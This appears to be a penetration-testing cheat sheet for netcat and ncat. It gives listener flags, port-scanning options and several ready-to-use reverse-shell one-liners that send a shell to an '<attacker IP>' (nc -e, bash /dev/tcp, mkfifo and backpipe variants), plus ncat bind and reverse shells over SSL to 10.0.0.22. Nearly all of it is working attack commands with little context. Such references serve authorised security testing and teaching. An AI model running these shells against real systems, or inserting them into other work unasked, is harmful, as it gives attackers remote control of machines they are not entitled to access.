Netcat
nc -lvnp <port-to-listen-on>
-l | Listen |
-v | Verbose |
-n | Nodns - do not resolve hostnames via DNS |
-p | Source-port - port |
Connect to nc listener (netcat traditional method)
nc -e /bin/sh <attacker IP> <listener port>
Connect to nc listener (/dev/tcp method)
bash -i >& /dev/tcp/<attacker IP>/<listener port> 0>&1
No -e and no /dev/tcp available
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe |nc <attacker ip> <listener port> 1>/tmp/backpipe
Most reliable method
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <attacker port> >/tmp/f
Check for netcat traditional on a server
nc -e /bin/sh
Using ncat instead
Setup a bind shell
ncat -e /bin/bash -lvnp 4444 --ssl
connect to ncat listener
ncat -v 10.0.0.22 4444 --ssl
Setup reverse shell (listener)
ncat -lvnp 1337 --ssl
Connect with reverse shell
ncat -e /bin/bash -v 10.0.0.22 --ssl
Scanning with netcat
nc -zv <ip> <port>
-z | zero I/O mode [used for scanning] |
Other Uses
Netcat TCP port scanner
TCP Connect scan
completes the three-way handshake
Netcat UDP port scanner
the -u flag specifies a udp scan
Last updated
